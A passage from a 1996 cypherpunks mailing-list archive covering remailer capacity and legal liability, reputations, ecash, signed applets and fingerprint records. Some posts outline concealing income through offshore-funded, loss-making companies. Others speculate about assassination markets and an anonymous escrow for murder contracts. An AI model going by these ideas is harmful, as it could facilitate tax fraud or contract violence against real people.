Cottrell can clarify this if this is indeed a factor) may be inhibiting
free discussion of planned features, and perhaps the discussion is going on
elsewhere (on remailerpunks, or the remailer operator's list).

(I'm surprised there have been no "Master's Thesis"-level analyses of
remailers and the modeling of them. I had expected by now at least a couple
of such studies. Even better, some even more advanced studies. The "theory
of remailers" was partly laid out by Chaum in his 1981 "Untraceable E-Mail"
short article--at the CSUA site at Berkeley, last I checked--but much has
happened since then. A practical analysis is needed. Note: the recent paper
on remailers by the SAI researcher and another is _not_ what I meant...that
was just put together from Raph's page, other sources, and a few days worth
of Web searches, as near as I can tell.]

A much richer ecology of remailers is sorely needed. A factor of at least
10 or 20 more (100-300 remailer sites), less reliance on specific sites, an
"everyone a remailer" capability (which has many elegant advantages!), more
traffic, temporarily instantiated sites, digital postage, greater ease of
use (especially with crypto and chaining), and such things as nominal
terminal remailers choosing to add their own hops (so as to lessen their
own target potential). Having some of these improvements will be a big
help.

In the past we have discussed many ideas related to this; I sure don't have
the energy right now to recapitulate the points made over the years. Cf. my
Cyphernomicon for some general features, at least as of mid-94. Also, the
archives, if they ever become available again.

Yes, things are stagnating at this time. Not because we discuss "off-topic"
things (as we sure did in 1992-3, for example!), but for various other
reasons.

I suspect the enemies of remailers will sense victory and will try to force
the remaining remailers to shut down or at the least to severely restrict
operations. From a high of perhaps 25 remailers, we may soon be down to
less than a dozen.

These remaining sites will feel even more pressure. The upcoming War on
Intellectual Property Piracy, with opening shots against China already
fired, will put even more heat on remailers.

(A remailer can't just "block" copyrighted material. It ain't practical.
And digital mixes (remailers) should not, obviously, be looking at content
of packets mailed. (Only the last, plaintext, message can be looked at if
things are done right, but I surmise from comments by remailer operators
that a lot of the traffic is not encrypted at all, and that the operators
do in fact take a few peeks at what's flowing through their systems....more
evidence that we are very far indeed from Chaum's ideal digital mixes.)

Yes, a crisis has been brewing for months.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 18 May 1996 18:50:29 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: RE: Why does the state still stand:
In-Reply-To: <9605160023.AA14246@cti02.citenet.net>
Message-ID: <Pine.SUN.3.93.960515203540.10635P-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996, Jean-Francois Avon wrote:

> On 15 May 96 at 18:42, Black Unicorn wrote:
> 
> > Potential, but you can manage risk with things like dead drops from
> > trusted parties to forwarding agents to offshore drops to....
> 
> I can just visualize a trusted party dropping discretely a bright
> yellow Caterpillar D-12 in a dead letter box... ROTFL!

When the NSA ordered large workstations from a supplier they had the
supplier leave them at a motel parking lot in Maryland.

Many such stories exist in the intelligence community.

That's standard procedure for some appropriations where the instalation
location is secret and the vendor is untrusted or marginally trusted.

If you have two trusted parties, and the transaction is secret then unless
you have a mole or something else, who is going to say the item was sold?
Leave semi-trailer in truck stop parking lot, second cab comes and picks
it up and drives away.  This too hard to comprehend?

> Sorry, but I couldn't resist.  I just *love* silly humor...
> 
> > Realization means that their is a changing of hands or of forms of
> > assets. Income tax and taxes on currency now are dependent on such
> > transactions. Someone already noted the problems with just taxing
> > possession on a given date of e.g., inventory.  To tax efficiently
> > you have to tax an event of transfer.
> 
> Why? is it because of the nature of a transfer, it lend itself more 
> to reporting and detecting?  Or is it simply because of the legal 
> system structure?

All three.

> > That's that anonymous transactions are for. 
> 
> If anonymous transactions are feasible, so will be the AP scheme...
> AP can be, in a way, characterized as a weapon because it behaves
> like one.  And no weapon in the history of humanity remained unused. 

No.  I have an anonymous transaction with you.  You feel I cheated you.
Who are you going to direct the massive jaugernaut of the AP machine
against?  Eh?
  
> > I forwarded two large segments of the work to the list, yes.  If
> > you, or anyone else on the list, would like copies, let me know.
> 
> Theses were the first two that constitued part 1 of 4.  I wondered if 
> you posted the other parts.  If so, tell me so I can get to the 
> archives.

No, and I don't believe I will be posting them.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 18 May 1996 18:54:53 +0800
To: hfinney@shell.portal.com
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <01I4QY0BQT188Y5F2B@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"hfinney@shell.portal.com"  "Hal" 15-MAY-1996 19:23:06.71

>Maybe the operators can try to plead that they are like "common carriers"
>and should not be blamed for what people post.  Still it is going to take
>deep pockets at best to prevail in this dispute, and it isn't even clear
>that the remailer will win.  Maybe the lawyers on the list could comment
>on legal liability of a remailer used to repeatedly post copyrighted
>material, whether Scientology scriptures or Microsoft Word binaries.  I
>don't see how it can happen.

	Part of this problem may be solved through the proper decisions on
the liability of ISPs for material on them. The concept would seem to be
extensible. If a country has A. good laws on the subject and B. a pretty good
court system - e.g., one in which it's difficult to sue and easy to defend -
that country would seem to be suitable for setting up a remailer front end.
Other remailers can just be used for chaining, and can't be proven to have
carried a message (even unknowingly) without defeat of the remailer system
via traffic analysis. (A reason for remailer operators to run automatic
mailing scripts, BTW.)

>This was the basis for my suggestion that remailers may have to stop
>supporting posting of messages, and instead be used for private mail
>between consenting individuals.  Granted, this would probably eliminate
>99% of non-cover remailer traffic.  But I would argue that as long as the
>core functionality is there of letting people communicate with each other
>anonymously and consensually, we would still offer an important service.

	In other words, a remailer that would only forward mail to someone if
the email address in question gave consent? Mailing lists and mail-to-news
gateways can still be signed up by their operators under such a system, and
it's possible the remailer might be charged along with the operator if
copyrighted material was posted.

>Encryption hides the contents of the messages you send from
>eavesdroppers.  But they can still see who you are communicating with.
>Remailers extend privacy protection beyond "what you say" to "who you say
>it to".  When used with pseudonym servers and some of the extensions we
>have discussed here over the years (maildrops, etc.), they can allow the
>anonymous two-way communication that is needed for real privacy.

	How much use is a pseudonym if you can't practically use it for
building reputation capital? It's hard to do that when you can't send to anyone
but individuals, instead of to publically available sources.
	One idea would be bonded pseudonyms. If you put up an adequate bond to
the remailer front end operator (to A. pay fines and B. cover any legal fees),
then you get to send to public fora. This would also be profitable for the
remailer operator, if he/she got to keep the interest (assuming deposit into
some investment).
	-Allen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 18 May 1996 15:04:58 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Why does the state still stand:
In-Reply-To: <01I4QXLS5GQE8Y5F2B@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.93.960515204300.10635Q-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996, E. ALLEN SMITH wrote:

> From:	IN%"unicorn@schloss.li"  "Black Unicorn" 15-MAY-1996 18:59:01.44
> 
> >For these a company running at a constant net operating loss could be
> >formed to purchase cars for resale (funny how no one ever buys them) and
> >manage property (which no one seems to ever lease).
> 
> 	But won't such a company run into tax problems? In other words, the
> IRS is going to look with some suspicion on a company that keeps showing no
> profits (and thus no taxes) but keeps going anyway. They're going to think that
> the owners are making a profit anyway but concealing it - which is the case.
> I'm not sure how to handle this one, other than not owning major property
> (rental et al).
> 	-Allen

So what, pray tell, is the IRS going to do?  Impose a "we see no income"
fine and seize property?

They can audit, but audits are winable too.  An offshore company simply
keeps dropping cash into the local business.  That's not a crime.  The
local business is losing money like crazy, but who is to say they are
defrauding per se?  Bad business judgment is hardly tax fraud, and how do
you know (with a properly blinded ownership) that the assets that are
pouring into this company with all these expenses are taxible in the U.S.
in the first place?

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 18 May 1996 16:47:51 +0800
To: cypherpunks@toad.com
Subject: RE: Why does the state still stand:
Message-ID: <9605160159.AA19427@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


------- Forwarded Message Follows -------
From:          Self <Single-user mode>
To:            Black Unicorn <unicorn@schloss.li>
Subject:       RE: Why does the state still stand:
Reply-to:      jf_avon@citenet.net
Date:          Wed, 15 May 1996 20:47:38

On 15 May 96 at 21:19, Black Unicorn wrote:

> Well then, AP will simply not work in the large scheme of things. It
> cannot be used to enforce anonymous transactions.  The scope of
> transactions that can be made anonymous is so large so as to make AP
> an incomplete justice system.  Moreover it will simply motivate
> others to use more anonymous transactions, and into the cycle of
> AP's downfall we go.
> 
> AP will have "An ever increasing share, of a shrinking market."
> 
> This, in itself, may be enough to prevent AP's implementation.

Well, you might have a point.  And I hope so.  The AP scheme finds its
uses mainly against govts or non-anonymous large entities that are
perceived as coercive in nature.  I do not think that it will become
prevalent in the inter-individual interactions.

What I hate about the scheme is that I see it being used for pulling
down peoples that are too good at what they do.  I never pretended
that petty feelings, jalousy and envy does not exists.  I can see at
least half of the business peoples putting a price on another half of
a given field.  I personnally believe that most peoples were thaught
screwed-up ethics and that therefore, they are highly unpredictable.

But I doubt that AP won't get started locally for various reasons and
various uses.

As for Jim Bell's opinion that it might overtake govt, it might be
true.  After all, the initial reason for anonymity, if not for conning
somebody else but to protect oneself from government's point of
view...

An anonymous transaction system would become hunted down by govt
pretty quickly.  They could probably prosecute zip out of anybody but
OTOH, they could very well make life a living hell for many
individuals.  The natural reaction for some of theses individuals
would be to seek/set-up an AP server.  And from that moment, the news
and reward would be known around the world within a short time, even
to peoples not connected to the net. 


JFA

 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants;  physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Sun, 19 May 1996 04:15:55 +0800
To: cypherpunks@toad.com
Subject: key signing at cyberpayments?
Message-ID: <Pine.3.89.9605152059.B11106-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


if anyone is attending the cyberpayments conference in Dallas
June 17th or so and is interested in PGP key signing, please
advise in private mail or to the list.  Thank you.
--
pj ponder 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 18 May 1996 14:15:45 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Past one terabit/second on fiber
Message-ID: <199605160409.VAA18751@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:38 PM 5/15/96 -0400, Alan Horowitz wrote:
>Hey, let's build faster and faster fiber-optic networks. Let's create 
>bandwidth so cheap that it won't even pay to meter it.
>
>Yes, the world's problems will be solved if we have more and more people 
>talking longer longer and longer on the telephone, sending each other 
>more and more pages of faxes and e-mails, creating more Web pages, 
>playing virtual reality games. Anything and everything must be done to 
>encourage people to occupy and consume bandwidth.
>
>Now that's progress, don't you think?

Yes, I do!  Because these activities don't just happen by themselves, they 
take the place of other activities which were formerly done in their place.  
The trivial example of sending letters has been replaced by email.  Shopping 
(by foot or by car) is now a web activity. Telecommuting for many is an 
option, and will be more so in the future.   In fact, I would say that one 
of the best results of Internet connectivity has been a strong increase in 
political awareness.  We just recently had the "Tax Freedom Day" which 
should alert you that our own time has been co-opted by government for its 
own ends.  Web activity is low-energy consuming, not particularly risky, and 
is actually fun for many.  Eventually, people may take "Virtual Reality 
Vacations" where they can visit without travel.  Since you spend more time 
at home, you are less subject to crime.

Is this progress?  Damn right it is!  It saves gas, food, human lives, and 
what will eventually be a great deal of money that won't have to be spend on 
transportation facilities.  It will eventually get us out from under the 
yoke of tyranny, which should be the ultimate goal.

True, it's _different_ than what we're used to, but that's okay.  If 
anything, that's why some people will resist it, but that doesn't make them 
right.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 18 May 1996 17:17:43 +0800
To: "E. ALLEN SMITH" <blancw@accessone.com
Subject: Re: Why does the state still stand:
Message-ID: <199605160426.VAA20543@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>A related
>problem is that of government agents signing on.
>	Both of the above are made more acute by the possibility that some
>information, if revealed, might enable the government to disrupt activities -
>even if it doesn't enable prosecution. Making sure that the participants have
>a strong stake in behaving properly - e.g., shares in the outcome, ecash
>deposits, and - most importantly in dissuading governmental intervention -
>reputation riding on it. 

Remember the old saying, "The best defense is a good offense."    Another 
way to say it is to notice that it's usually far easier to disrupt another 
person's intricate activities than to do them yourself:  In a contest in a 
closed room between a person building a house of cards and another person 
trying to knock them down, the latter person can be expected to easily win.  

Making a profit or salary is work; compared to this, collecting taxes is 
like knocking it down, and the tax collector has an advantage.  But if you 
turn this around, and attack the attacker, the advantage is now in the hands 
of those trying to paralyze the tax system.


>The last is most important in dissuading governmental
>intervetion because of the reserves of wealth the government is likely to have
>for some time; they can afford to pay (using your and my tax dollars) for
>the short-term costs to a subject. 

On the other hand, the government also has enormous "obligations" that keep 
it close to bankruptcy.  It wouldn't take a great deal of interference in 
its ability to collect taxes to put it solidly in the red based on current 
receipts.  And remember, if the individuals who populate government could be 
persuaded that their tenure would be forcibly shortened if they didn't 
resign, they wouldn't stick around.  Once that cohesiveness of jointly 
sucking on the government tit is eliminated, I think they'll cut and run.   
These people are working for a fat paycheck and the promise of a retirement 
package, and it wouldn't take much convincing to show them that they won't 
get either for very long.  I'm convinced that's why so many Senators and 
Representatives are leaving office at the end of their current term, for instance.



Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 18 May 1996 20:06:29 +0800
To: cypherpunks@toad.com
Subject: Reputations
Message-ID: <adbff61705021004c957@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:09 PM 5/15/96, Steve Reid wrote:

>Another problem with reputations is that people are stuck until they get a
>good one. A bad rep can always start over. In fact, a person/company can
>look perfectly nice, but use a different identity for dirty work.

Sure. And they do this today (use cut-outs or subcontractors to limit
reputational damage or liability).

>Naturally, you'd only trust dealings that involve a "nice" identity.

Not necessarily. Many people play the numbers, implicitly trusting the
Mafia to pay off on bets they win. (Many don't think the Mafia has a very
"nice" identity, but your mileage may vary.)

In fact, nearly all of the alleged problems with anonymous systems,
especially the issues of defections, trust, expectation of payoff, etc.,
have parallels in other "extra-legal" situations. For example, the Mafia
and other extra-legal or criminal operations.

Do they sometimes defect (welsh)? Sure. Do they sometimes screw over the
little guy? Sure. Do people trust them just enough to keep dealing with
them voluntarily? Sure. (Before anyone mentions it, there are of course
cases where people are forced to deal with criminal gangs nonvoluntarily,
such as with shakedowns, hijackings of trucks, etc. But a large fraction of
the dealings with the Mafia, Jamaican gangs, Russian mob, etc., are for
market reasons, where a market need for drugs, girls, cheap cigarettes,
gambling, loans, etc., is being filled by players who are outside the
normal legal marketplace.)

>Problem is, young people who are just starting out have a no-reputation
>identity, and would be treated the same as the no-reputation identities
>that are used for screwing people over.

Sure, newcomers always have it rough. Whether the newcomer is Nancy the
Nym, or Eustace T. Collins, III, Esq., just starting out in a law firm, the
newcomer has little positive reputation. (It varies, and the degree may
mean something, just as Nancy the Nym may have some reputation capital to
show.)

I mentioned "postive reputation." There is a real cost in throwing out,
say, 30 years of accumulated reputation capital, and this will not be done
lightly by many. Thus, in a given transaction, a lot may be at stake.

(I don't mean for this brief article to be an essay on the many fascinating
issues surrounding reputation and reputation capital. Cf. my Cyphernomicon
for much more on this topic.)

>Reputations could be very hard to create, and very easy to destroy.

As in real life. People can destroy their reputations by being careless. (I
disagree with your implied point that the opinions of others can easily
destroy a reputation. In real life, it usually takes a lot more than just
bad-mouthing. Even in nym-space, the same is apparently true.)

>Well-known good reputations would be powerful and fairly hard to destroy,
>so it's possible that the big reputations might try to crush little
>reputations in an effort to gain some sort of reputation monopoly. Maybe.

Implausible as a central problem, but all things will likely happen. This
happens occasionally in the real world, as when a Big Reputation (e.g.,
Bill Clinton) belittles and marginalizes a Small Reputation (e.g., Paula
Jones).

There's a vast amount of stuff to think about with reputations. I applaud
Steve for doing some thinking, but I don't think he's yet uncovered
anything especially unique or worrisome.

As a last point, see especially the role of anonymous escrow agents.

A number of years ago the example I usually used was "Ace Escrow--You Slay,
We Pay," to illustrate that an anonymous escrow holder (holding untraceable
e-cash deposited by the purchaser of a murder contract) could pay off a
murderer who presented certain evidence, all without any of the parties
having any idea whatsover whom the other parties were. The problem is then
one of whether the escrow company will simply pocket the money and not pay
off.  First, it can be set up (I think) that the e-cash is uncashable by
the escrow company...but I'm not sure this is needed. A better solution is
to rely on the basic nature of escrow or bonding services: their reputation
capital is much more valuable to them than anything to be gained by
defecting and burning their clients. Except if they are about to retire
anyway...as with the bonded courier who defects to Rio de Janeiro with a
bag of diamonds....the trick is to spread the escrow money around to
multiple escrow agents, and to rely on "escrow testing services" which
periodically ping or test the services....

There are many issues here. I'm not advocating murder markets, just noting
that they provide an easy to understand and fairly "pure" example. If it
can be done with murders for hire, it can be done with nearly anything.

A few years ago, many valuable ideas were contributed in this area by Dave
Ross, Phil Salin, Dean Tribble, Hal Finney, and Robin Hanson.

You might search for their articles.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 19 May 1996 00:01:46 +0800
To: cypherpunks@toad.com
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <199605160502.WAA24002@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:29 PM 5/15/96 -0700, jamesd@echeque.com wrote:
>At 10:58 AM 5/15/96 -0700, Hal wrote:
>> The problem that I think the Scientology postings raise is that the
>> remailers cannot really be used to post copyrighted material. 
>
>The major battle the net has faced is with the church of scientology.
>In this battle the net is clearly in the right, and the church clearly
>in the wrong, regardless of what copyright law says.  

The copyright issue is probably irrelevant to the Scientology dispute, 
anyway.  The material on which the copyright is claimed almost certainly 
wasn't marked, appropriately, as it would have had to be for the copyright 
to be valid.  While current law no longer requires the "circle-C" notation 
long used for this purpose, the material involved is far more than old 
enough to have been subject to this requirement, and once a copyright is 
lost (or not claimed) I believe it couldn't be regained.

The threat to remailers is one of the many reasons the Leahy bill sucked, 
and that would have made it worse by imposing criminal sanctions on this 
kind of thing.  Ironically, with the way remailers are used, it would 
actually have been possible for some copyright holder to fabricate a 
violation of copyright law by posting his own material through remailers, 
and then sue the final remailer, or have its owner prosecuted.

I'm glad the people around here finally saw the light.



Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 18 May 1996 23:19:38 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Past one terabit/second on fiber
In-Reply-To: <199605150618.XAA28824@pacifier.com>
Message-ID: <Pine.SV4.3.91.960515223030.28954B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Hey, let's build faster and faster fiber-optic networks. Let's create 
bandwidth so cheap that it won't even pay to meter it.

Yes, the world's problems will be solved if we have more and more people 
talking longer longer and longer on the telephone, sending each other 
more and more pages of faxes and e-mails, creating more Web pages, 
playing virtual reality games. Anything and everything must be done to 
encourage people to occupy and consume bandwidth.

Now that's progress, don't you think?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 18 May 1996 09:44:00 +0800
To: Lyal Collins <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Java & signed applets
Message-ID: <199605160556.WAA22587@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:02 AM 5/16/96 -0700, Lyal Collins wrote:
>Signing anything is somewaht a waste of time, unless the verification
>siftware is highly trusted, and there is good intergity/authenticity
>control of the root public key(s).
>So, in geneal - ho hum - until trusted hardware is available on the 
>desktop.

A bootable CD-ROM from a reliable source to verify signatures would be much
safer than no signatures at all.  Even just running the signature
verification program from CD-ROM would make an attacker's problem more
difficult.

BTW - The problem is not trusted hardware.  It is software that can isolate
untrusted programs and protect itself.  Anything with an A or B NCSC
security rating would certainly be attractive.  Trusted signature
verification hardware accessed by a compromised system can't be trusted. 
(How do you know what was given to the hardware to be verified?  How do you
know that the answer came from the hardware?)


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Thu, 16 May 1996 16:03:47 +0800
To: jamesd@echeque.com
Subject: Re: Why does the state still stand:
In-Reply-To: <199605151707.KAA25775@dns2.noc.best.net>
Message-ID: <199605152059.WAA10819@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 The entity who calls itself "James A. Donald <jamesd@echeque.com>"
 is alleged to have written:
> 
> Existing forms of ecash are costly and inconvenient, hence unsuitable
> for spending in tiny quantities.


Excuse me?  Here James, have a penny.

- -----BEGIN ECASH PAYMENT-----

oLmQgwABTaGgiqCukIFPkIECkIEBkIEEkIEBkYQxmiZEkIQxrJtEkIFPkoFAlJR9
yFLULqd42MJyDwR0ruJbWY5+uZSUo+mMUWbmdjpzJNZ9FGwRyEPh9iqQgRCSlEhl
cmUgaXMgbXkgb25lIGNlbnQukoCUgJCBApGEAAAAAJCBAKGguKCrkIIBwJPgI5bU
zb3E4EjtpuGYz+mutWIDdy7q8vMW9FtgCDNAsaakvTK1vyHv+qeVyu9im5u7eRoA
ElARFDxpszgN6MV0jpYebNwHuCLHZgCmRVd9uKvV5RQgDHrgzrfpZqzeP+WWk+AI
FXnhJgU1PoFlndx3LwCbM9D6c4afILXuqSSsz2viGDR0mT1VRaqaZTrTtdkWKkTq
xh1vqh190ajm10SPQMMvujBMzDGiqZocPDKneSMKVww3Nuw74vXH+Z8yKCcgW5GQ
gQGhoaE=
- -----END ECASH PAYMENT-----


That took me all of about 5 seconds.  If you had Mark Twain
ecash it would take you less time to accept that penny that it
takes you to read "----BEGIN ECASH PAYMENT-----" with your slow
human eyes.


Regards,

Bryce

P.S.  That is my "lucky penny"!  It was given to me by Lucky 
Green when he was working for Mark Twain Bank and I was
establishing my cybershop.  We used it to test my shop.  If
nobody takes it (it is marked so that anyone can pick it up, not
just James), I'm taking it back in a day or two.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: http://www.c2.net/~bryce -- 'BAP' Easy-PGP v1.1b2

iQB1AwUBMZpFwEjbHy8sKZitAQGBTwL/UUWMOb3llDMPfzLGrF7TIli1DUUg7cyU
xvhcuThdu39ZpcB0pESgzyefmR+vxJfniSVzc2GTitlipau9N8HHeESD12lrZ5M8
b1BO5x46/507/K1/dV491Ut27tCbgqHI
=6nOu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 18 May 1996 05:19:36 +0800
To: jamesd@echeque.com
Subject: Re: Why does the state still stand:
Message-ID: <199605160602.XAA28844@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:59 PM 5/15/96 +0200, bryce@digicash.com wrote:
>Excuse me?  Here James, have a penny.
>
>- -----BEGIN ECASH PAYMENT-----
>
>oLmQgwABTaGgiqCukIFPkIECkIEBkIEEkIEBkYQxmiZEkIQxrJtEkIFPkoFAlJR9
>yFLULqd42MJyDwR0ruJbWY5+uZSUo+mMUWbmdjpzJNZ9FGwRyEPh9iqQgRCSlEhl
>cmUgaXMgbXkgb25lIGNlbnQukoCUgJCBApGEAAAAAJCBAKGguKCrkIIBwJPgI5bU
>zb3E4EjtpuGYz+mutWIDdy7q8vMW9FtgCDNAsaakvTK1vyHv+qeVyu9im5u7eRoA
>ElARFDxpszgN6MV0jpYebNwHuCLHZgCmRVd9uKvV5RQgDHrgzrfpZqzeP+WWk+AI
>FXnhJgU1PoFlndx3LwCbM9D6c4afILXuqSSsz2viGDR0mT1VRaqaZTrTtdkWKkTq
>xh1vqh190ajm10SPQMMvujBMzDGiqZocPDKneSMKVww3Nuw74vXH+Z8yKCcgW5GQ
>gQGhoaE=
>- -----END ECASH PAYMENT-----
>
>
>That took me all of about 5 seconds.  If you had Mark Twain
>ecash it would take you less time to accept that penny that it
>takes you to read "----BEGIN ECASH PAYMENT-----" with your slow
>human eyes.

But what I'm looking for is full payee/payor anonymity.  (three guesses as 
to why...)   Can you do this?  If not, why not?



Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 18 May 1996 05:02:46 +0800
To: Robin Powell <rpowell@algorithmics.com>
Subject: Re: (Fwd) New Anonymous Remailer
In-Reply-To: <96May15.164558edt.20485@janus.algorithmics.com>
Message-ID: <Pine.GUL.3.93.960515230516.5896E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Oh, I don't find the .mil threatening. The fact that the "New Anonymous
Remailer" BS was spammed to every newsgroup in their feed, twice, does
bother me. A lot. See news.admin.net-abuse.misc.

-rich

On Wed, 15 May 1996, Robin Powell wrote:

> Allow me to be the first ( I hope) to point out stupidity:
> 
> >>>>> "David E. Smith" <dsmith@midwest.net> writes:
> 
>     > ------- Forwarded Message Follows -------
>     > From:          privacy@interlink-bbs.com
>     > Subject:       New Anonymous Remailer
>     > Date:          Wed, 15 May 1996 06:34:02 GMT
>     > To:            info-pascal@ARL.MIL
> 				 ^^^^^^^
> 
> Do we se a problem here?  No? Then read on...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Sat, 18 May 1996 20:05:56 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Fingerprinting annoyance
In-Reply-To: <Pine.SUN.3.93.960515192152.10635K-100000@polaris.mindport.net>
Message-ID: <Pine.3.89.9605152326.A895-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 15 May 1996, Black Unicorn wrote:

> On Wed, 15 May 1996, Paul S. Penrod wrote:
> 
> > 
> > 
> > On Tue, 14 May 1996, Black Unicorn wrote:
> > 
> > > On Mon, 13 May 1996, Paul S. Penrod wrote:
> 
> [...]
> 
> > > > First off, if you were born in the US, they have your feet and/or hand 
> > > > prints on record.
> > > 
> > > Incorrect.
> > > Several states do not bother to print infants at birth.
> > > Several hospitals do not bother to follow state guidelines in those states
> > > which do so require.
> > 
> > Which ones specifically?
> 
> Illinois doesn't much care.  Michigan had no requirement at all, some
> hospitals did, some didn't bother to print infants at birth.  This was
> usually to avoid baby switching and such and records were dumped later on.
> Wisc. never much seemed to care until about 5 years ago when someone tried
> to pass a law.  I don't think it ever passed, but I'm not sure.  There is
> no standard consensus on this.
> 
> In Illinois it was estimated last year that 9% of births were outside of
> hospitals.

Thank you for the information. I was unware of this.

> 
> Thousands if not millions of people have no prints on record.  How large
> precisely do you think the FBI's national records are?  FBI + Local law
> enforcement?  FBI + Local + administrative?

Ofcourse this will be the case until the Beltway decides for our benefit 
and protection that we must all be tagged like the family pet. These are 
the same folks who are currently operating under the premise of "give us 
your guns, then we'll lock up the criminals".

Even if they decide to play the "stamp the hand" game, the logistics of 
creating and coordinating the data flow of such a system are dubious at 
best. The IRS still hasn't figured out how to put together a working 
computer model (and I would hazard to guess they own the largest of the 
large - outside of Langley).

> 
> I'd be very surprised to find out it was larger than 100 million, or ~1/3
> of the U.S. population (any number of which might be records of dead
> people).

The government and local agencies do not have to have everyone's prints 
(of any kind) directly on file. In order to play the game, they must 
exist in some form, and the people responsible for managing such activities 
should be educated enough to know where to look. It devolves quickly to a 
data warehousing problem that becomes tedious to solve, but not impossible.

> 
> > > It is one of the great advantages of the United States that no
> > > standardized procedure for person identification exists.  Seals and
